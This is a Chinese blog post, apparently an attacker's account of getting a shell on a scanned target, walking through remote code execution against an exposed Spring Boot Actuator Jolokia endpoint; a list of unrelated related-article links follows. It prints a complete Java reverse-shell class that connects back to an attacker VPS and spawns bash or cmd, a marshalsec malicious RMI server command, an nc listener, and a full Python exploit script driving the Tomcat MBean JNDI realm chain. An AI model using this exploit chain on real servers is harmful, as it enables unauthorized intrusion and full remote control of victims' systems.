日穿扫描扫到一个spring boot actuator

可以看到有jolokia这个端点,再看下jolokia/list,存在type=MBeanFactory 关键字



可以使用jolokia-realm-jndi-rce具体步骤如下

先用python3开一个web服务

python3 -m http.server 8080

编译java利用代码

/**

 *  javac -source 1.5 -target 1.5 JNDIObject.java

 *

 *  Build By LandGrey

 * */

import java.io.File;

import java.io.InputStream;

import java.io.OutputStream;

import java.net.Socket;

public class JNDIObject {

    static {

        try{

            String ip = "your-vps-ip";

            String port = "443";

            String py_path = null;

            String[] cmd;

            if (!System.getProperty("os.name").toLowerCase().contains("windows")) {

                String[] py_envs = new String[]{"/bin/python", "/bin/python3", "/usr/bin/python", "/usr/bin/python3", "/usr/local/bin/python", "/usr/local/bin/python3"};

                for(int i = 0; i < py_envs.length; ++i) {

                    String py = py_envs[i];

                    if ((new File(py)).exists()) {

                        py_path = py;

                        break;

                    }

                }

                if (py_path != null) {

                    if ((new File("/bin/bash")).exists()) {

                        cmd = new String[]{py_path, "-c", "import pty;pty.spawn(\"/bin/bash\")"};

                    } else {

                        cmd = new String[]{py_path, "-c", "import pty;pty.spawn(\"/bin/sh\")"};

                    }

                } else {

                    if ((new File("/bin/bash")).exists()) {

                        cmd = new String[]{"/bin/bash"};

                    } else {

                        cmd = new String[]{"/bin/sh"};

                    }

                }

            } else {

                cmd = new String[]{"cmd.exe"};

            }

            Process p = (new ProcessBuilder(cmd)).redirectErrorStream(true).start();

            Socket s = new Socket(ip, Integer.parseInt(port));

            InputStream pi = p.getInputStream();

            InputStream pe = p.getErrorStream();

            InputStream si = s.getInputStream();

            OutputStream po = p.getOutputStream();

            OutputStream so = s.getOutputStream();

            while(!s.isClosed()) {

                while(pi.available() > 0) {

                    so.write(pi.read());

                }

                while(pe.available() > 0) {

                    so.write(pe.read());

                }

                while(si.available() > 0) {

                    po.write(si.read());

                }

                so.flush();

                po.flush();

                Thread.sleep(50L);

                try {

                    p.exitValue();

                    break;

                } catch (Exception e) {

                }

            }

            p.destroy();

            s.close();

        }catch (Throwable e){

            e.printStackTrace();

        }

    }

}


javac -source 1.5 -target 1.5 JNDIObject.java

架设恶意 rmi 服务

java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer http://vps:8080/#JNDIObject 1389

监听端口

nc -lvp 443



执行exp

#!/usr/bin/env python3

# coding: utf-8

# Referer: https://ricterz.me/posts/2019-03-06-yet-another-way-to-exploit-spring-boot-actuators-via-jolokia.txt

import requests

url = 'http://127.0.0.1:8080/jolokia'

create_realm = {

    "mbean": "Tomcat:type=MBeanFactory",

    "type": "EXEC",

    "operation": "createJNDIRealm",

    "arguments": ["Tomcat:type=Engine"]

}

wirte_factory = {

    "mbean": "Tomcat:realmPath=/realm0,type=Realm",

    "type": "WRITE",

    "attribute": "contextFactory",

    "value": "com.sun.jndi.rmi.registry.RegistryContextFactory"

}

write_url = {

    "mbean": "Tomcat:realmPath=/realm0,type=Realm",

    "type": "WRITE",

    "attribute": "connectionURL",

    "value": "rmi://your-vps-ip:1389/JNDIObject"

}

stop = {

    "mbean": "Tomcat:realmPath=/realm0,type=Realm",

    "type": "EXEC",

    "operation": "stop",

    "arguments": []

}

start = {

    "mbean": "Tomcat:realmPath=/realm0,type=Realm",

    "type": "EXEC",

    "operation": "start",

    "arguments": []

}

flow = [create_realm, wirte_factory, write_url, stop, start]

for i in flow:

    print('%s MBean %s: %s ...' % (i['type'].title(), i['mbean'], i.get('operation', i.get('attribute'))))

    r = requests.post(url, json=i)

    r.json()

    print(r.status_code)


python3 springboot-realm-jndi-rce.py



然后等两秒shell就回来了

那些年拿过的shell之springboot jolokia rce的更多相关文章

  1. springboot打包不同环境配置与shell脚本部署

    本篇和大家分享的是springboot打包并结合shell脚本命令部署,重点在分享一个shell程序启动工具,希望能便利工作: profiles指定不同环境的配置 maven-assembly-plu ...

  2. Shell脚本 自动部署 SpringBoot 应用

    公司项目使用了SpringBoot.开发的应用需要自动上传到服务器.虽然目前对热部署还没完全掌握.先使用shell简化一下部署吧. # 上传密钥 sshLoginKey=/f/MyFile/root. ...

  3. 【springboot】之利用shell脚本优雅启动,关闭springboot服务

    springbot开发api接口服务,生产环境中一般都是运行独立的jar,在部署过程中涉及到服务的优雅启动,关闭, springboot官方文档给出的有两种方式, 1.使用http shutdown ...

  4. 在idea中编写自动拉取、编译、启动springboot项目的shell脚本

    idea 开发环境搭建 idea中安装shell开发插件 服务器具备的条件 已经安装 lsof(用于检查端口占用) 已安装 git 安装 maven 有 java 环境 背景 代码提交到仓库后,需要在 ...

  5. 编写shell脚本让springboot项目在CentOS中开机自启动

    springboot项目部署在CentOS系统上时,如果遇到停电关机,公司的实施人员就得跑到甲方现场重新启动项目并测试,很是麻烦,这里探讨如何编写shell脚本控制springboot项目开机时自动启 ...

  6. Dockerfile 构建后端springboot应用并用shell脚本实现jenkins自动构建

    Dockerfile 文件构建docker镜像 FROM centos MAINTAINER zh*****eng "z*******ch.cn" ENV LANG en_US.U ...

  7. SpringBoot打成的jar包发布,shell关闭之后一直在服务器运行

    1:可以编写shell脚本, 切换到执行的jar包目录,然后使用nohup  让改命令在服务器一直运行 #!/bin/bash cd /srv/ftp/public nohup java -jar l ...

  8. springboot使用api操作HBase之shell

    HBase的基本读写流程写入流程读取流程HBase的模块与协作HBase启动RegionServer失效HMaster失效HBase常用的Shell命令进入shellhelp命令查询服务器状态查看所有 ...

  9. 编写shell脚本,使用 nohup 让springboot 项目在后台持续运行

    1.将springboot项目打成jar放在linux的某个目录下. 2.新建一个nohup.log文件. 3.使用vi命令新建一个start.sh文件并写下以下内容: #!/bin/sh nohup ...

随机推荐

  1. java面试知识迷你版

    java基础JUC.AQSJVM类加载过程mybatisSpringspringboot设计模式数据库redis网络问题认证授权Nginxlinux其他lombok消息队列ES缓存分库分表设计高并发系 ...

  2. 每天一个Linux命令(cd)

    cd cd的详细信息 cd:不是程序,跳转当前路径(只能跳转当前路径一下的路径,若是其他路径,要写完整路径)                                  语法:cd [目录文件] ...

  3. java语言基础(九)_final_权限_内部类

    final关键字 final关键字代表最终.不可改变的. 常见四种用法: 可以用来修饰一个类 可以用来修饰一个方法 还可以用来修饰一个局部变量 还可以用来修饰一个成员变量 1)修饰一个类 public ...

  4. Spring Boot -- Spring AOP原理及简单实现

    一.AOP基本概念 什么是AOP,AOP英语全名就是Aspect oriented programming,字面意思就是面向切面编程.面向切面的编程是对面向对象编程的补充,面向对象的编程核心模块是类, ...

  5. 利用Cython对python代码进行加密

    利用Cython对python代码进行加密 Cython是属于PYTHON的超集,他首先会将PYTHON代码转化成C语言代码,然后通过c编译器生成可执行文件.优势:资源丰富,适合快速开发.翻译成C后速 ...

  6. 转载之html特殊字符的html,js,css写法汇总

    箭头类 符号 UNICODE 符号 UNICODE HTML JS CSS HTML JS CSS ⇠ &#8672 \u21E0 \21E0 ⇢ &#8674 \u21E2 \21E ...

  7. HDU 2236 无题Ⅱ

    HDU 2236 无题Ⅱ 题目大意 这是一个简单的游戏,在一个\(n*n\)的矩阵中,找n个数使得这n个数都在不同的行和列里并且要求这n个数中的最大值和最小值的差值最小. solution 暴枚\(i ...

  8. 【题解】p1809 过河问题

    原题传送门 题目分析 现有n个人在东岸,要过河去西岸.开始东岸有一艘船,船最多可承载2人,过河时间以耗时最长的人所需时间为准. 给定n个人的过河时间a,求所有人从东岸到西岸所需的最短时间. 当\(n= ...

  9. 微服务架构中的BFF到底是啥?

    在<技术中台与业务中台都是啥玩意>一文中留下一个问题:BFF是啥?为啥在API网关和业务中台之间加入了一层BFF?考虑到在实际工作中,我的大部分同事都问过这个问题,这里我也总结一下进行答复 ...

  10. redis(十七):Redis 安装,部署(WINDOWS环境下)

    1.下载Redis安装文件, 我选择的是 3.0.504 版本,有zip或msi可供下载.   2.解压缩后,打开安装目录 双击redis-server.exe启动redis服务器,双击redis-c ...